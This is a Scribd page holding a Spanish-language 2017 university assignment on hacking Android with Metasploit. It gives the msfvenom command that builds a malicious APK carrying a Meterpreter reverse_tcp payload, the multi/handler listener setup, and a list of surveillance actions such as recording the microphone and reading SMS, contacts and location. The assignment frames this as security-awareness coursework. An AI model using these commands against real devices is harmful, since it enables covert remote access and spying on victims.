Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • 988 vistas

    Metasploit Android

    Cargado por

    Luis Ángel Vallecillo
    Este documento describe cómo hackear dispositivos Android utilizando Metasploit. Explica los pasos para crear un archivo APK malicioso con msfvenom que implemente un payload Meterpreter inverso para establecer una sesión remota desde Kali. Luego, se describe cómo configurar Metasploit en Kali para escuchar la conexión inversa y obtener acceso de sistema remoto al dispositivo Android una vez que la víctima ejecute el APK malicioso.

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd

    Metasploit Android

    Cargado por

    Luis Ángel Vallecillo
    988 vistas6 páginas
    Este documento describe cómo hackear dispositivos Android utilizando Metasploit. Explica los pasos para crear un archivo APK malicioso con msfvenom que implemente un payload Meterpreter inverso para establecer una sesión remota desde Kali. Luego, se describe cómo configurar Metasploit en Kali para escuchar la conexión inversa y obtener acceso de sistema remoto al dispositivo Android una vez que la víctima ejecute el APK malicioso.

    Descripción original:

    Vulnerabilidad en Android

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Este documento describe cómo hackear dispositivos Android utilizando Metasploit. Explica los pasos para crear un archivo APK malicioso con msfvenom que implemente un payload Meterpreter inverso para establecer una sesión remota desde Kali. Luego, se describe cómo configurar Metasploit en Kali para escuchar la conexión inversa y obtener acceso de sistema remoto al dispositivo Android una vez que la víctima ejecute el APK malicioso.

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Descargar como pdf o txt
    988 vistas6 páginas

    Metasploit Android

    Cargado por

    Luis Ángel Vallecillo
    Este documento describe cómo hackear dispositivos Android utilizando Metasploit. Explica los pasos para crear un archivo APK malicioso con msfvenom que implemente un payload Meterpreter inverso para establecer una sesión remota desde Kali. Luego, se describe cómo configurar Metasploit en Kali para escuchar la conexión inversa y obtener acceso de sistema remoto al dispositivo Android una vez que la víctima ejecute el APK malicioso.

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Descargar como pdf o txt
    Está en la página 1de 6

    Universidad Nacional Autónoma de Nicaragua

    UNAN-LEÓN

    Carrera: Ingeniería en sistemas de la información.


    Componente: Introducción a la seguridad en redes
    Tema: Hackeando Android con Metasploit
    Profesor: Dennis Espinoza
    Grupo: 1.
    Fecha: 12 de julio del 2017.

    Integrante
    Br. María Narváez Argeñal.
    Br. Luis Ángel Vallecillo Dávila

    ¡A la libertad por la Universidad!


    Metasploit es un proyecto open source de seguridad informática que proporciona información
    acerca de vulnerabilidades de seguridad y resulta muy útil durante los tests de penetración o
    pentesting. El proyecto más conocido es el Metasploit Framework, una herramienta para
    desarrollar y ejecutar exploits (fragmento de software, fragmento de datos o secuencia de
    comandos y/o acciones utilizada con el fin de aprovechar una vulnerabilidad de seguridad de
    un sistema de información) contra una máquina remota. Otras de las funcionalidades de esta
    herramienta son: base de datos de payload, herramientas para recolectar información y
    escanear en busca de vulnerabilidades.

    Los pasos básicos a seguir para explotar vulnerabilidades usando Metasploit son:

     Elegir y configurar el exploit (como hemos dicho, código que permite explotar la
    vulnerabilidad de un sistema).
     Confirmar si el objetivo es susceptible al exploit elegido (este paso es opcional).
     Elegir y configurar el payload (código que se ejecuta una vez explotemos la
    vulnerabilidad).
     Elegir la técnica de encode o codificación para que el payload no sea detectados
    por los elementos de seguridad del equipo (también es opcional aunque
    recomendable).
     Ejecutar el exploit.

    Para la realización de éstas y otras acciones, metasploit incorpora las siguientes


    herramientas:

     msfconsole: línea de comandos de Metasploit.


     msfcli: interfaz que permite lanzar un módulo concreto mediante su configuración
    en la misma ejecución de la aplicación.
     msfgui: interfaz gráfica de Metasploit.
     msfd: servicio que queda a la escucha de recibir conexiones para ofrecer una línea
    de comandos en remoto.
     msfbinscan: permite realizar búsquedas en ejecutables de instrucciones de salto,
    instrucciones POP
     msfpescan: permite realizar un análisis sobre DLLs y obtener la dirección de
    retorno deseada para que la shellcode se ejecute.
     msfpayload: permite generar payloads en distintos lenguajes de programación,
    pudiendo embeberlos en ejecutables Windows o binarios de UNIX.
     msfencode: permite ofuscar el código del payload para evitar su detección.
     msfvenom: es la unión de msfpayload y msfencode.
     msfupdate: se utiliza para actualizar el framework.

    Además de estas herramientas, metasploit se compone de distintos módulos. Estos


    módulos son:
     Módulo auxiliary: permite la interacción de herramientas externas, como pueden
    ser escaners de vulnerabilidades, sniffers.
     Módulo encoders: nos proporciona los diferentes algoritmos para codificar y
    ofuscar los payloads.
     Módulo exploits: aquí se encuentran todos los exploits disponibles en el
    framework.
     Módulo payloads: multitud de códigos que se ejecutan una vez tenga éxito el
    exploit.
     Módulo post: funcionalidades para la fase de post explotación durante un
    pentesting.
     Módulo nops: permite realizar u obtener operaciones nop.

    Explotando vulnerabilidad Android.

    Como es de público conocimiento el sistema operativo Android cubre aproximadamente


    el 85% del mercado, superando a Apple y Windows Phone. Por eso es tan importante
    mostrar algunos de los ataques que se pueden realizar para tomar conciencia de la
    seguridad de los dispositivos y de la información que un usuario expone en sus
    dispositivos.

    Con un par de simples líneas de comandos y un poco de ingeniería social podemos


    acceder a un dispositivo Android.

    NECESITAMOS:

    1. 1 Máquina Virtual con KALI (vamos a usar Metasploit)


    2. 1 Máquina Virtual con Android o 1 Dispositivo android

    Creamos el archivo malicioso, para eso usamos MSFVENOM desde una


    terminal:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI


    LPORT=Puerto_KALI R > /Escritorio/AplicacionMaliciosa.apk

    - msfvenom es la unión de msfpayload y msfencode, msfpayload se encarga de


    generar payloads para distintas plataformas, mientras que msfencode se encarga
    de codificar dichos payloads con el objetivo de evadir la detección mediante el
    uso de antivirus.

    - Mediante el flag -p especificaremos que se hará uso de un Payload con el cual


    atacaremos nuestro télefono objetivo, en nuestro caso: meterpreter.

    - Payload es una funcion que posee cierta amenaza en particular. Refiera a


    acciones adicionales, incluidas en virus, gusanos y troyanos. Un payload no es
    necesariamente maligno, sino que se refiere también a efectos secundarios
    nocivos para el ordenador
    - Lo siguiente en este comando ha sido seleccionar el Stager (es responsable de
    descargar una payload (la etapa), inyectándola en la memoria, y pasando la
    ejecución a ella.) a utilizar, en este caso hemos usado reverse_tcp, el cual nos
    permitirá reservar una zona en memoria y realizar una conexión. En esta zona es
    donde se guarda el Payload que generaremos.

    - LHOST y LPORT son básicamente la ip y puerto donde recibiremos los datos


    enviados remotamente por el telefono atacado. EL Puerto puede ser a elección
    propia, en este caso se escogió el Puerto 443 de manera aleatoria.

    - Finalmente mediante el flag R > <lugar donde guardaremos el


    apk>/<nombre apk>.apk, especificaremos donde quedará alojado nuestro
    apk y el nombre de este.

    (Opcional)
    msfvenom: Indicará que utilizaremos Metasploit para el ataque.
    -p: Indica a msfvenom que utilizaremos un payload.
    android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una
    conexión reversa, esto quiere decir que es el dispositivo vícima el que abrirá con
    nosotros una sesión en Meterpreter.
    lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que
    nos da el Router para identificarnos dentro del host.
    lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos
    normalmente usados como 80,4444, ya que puede estar siendo utilizado.

    En nuestro caso quedara de la siguiente manera.

    Lo próximo es dejar “escuchando” desde KALI hasta que la víctima ejecute la


    aplicación, para eso abrimos METASPLOIT y lo configuramos de la siguiente
    manera:
    msfconsole

    use exploit/multi/handler

    set payload android/meterpreter/reverse_tcp

    set LHOST IP_KALI

    set LPORT Puerto_KALI

    exploit

    Con esto tenemos una sesión de Meterpreter conectada hacia nuestra víctima, en este
    caso se puede ver que el comando “sysinfo”
    Con el comando HELP podemos ver qué acciones podemos hacer en el
    dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores,
    pero las acciones particulares de Android son:

     Grabar con el Micrófono


     Tomar Fotos con ambas cámaras (Frontal y Trasera)
     Hacer Streming desde la cámara seleccionada
     Verificar si el dispositivo es ROOTEADO
     Obtener el listado de llamadas
     Obtener el listado de Contactos
     Obtener los SMS
     Obtener la Ubicación del Dispositivo
     Enviar SMS
     Entre otras más cosas…

    También podría gustarte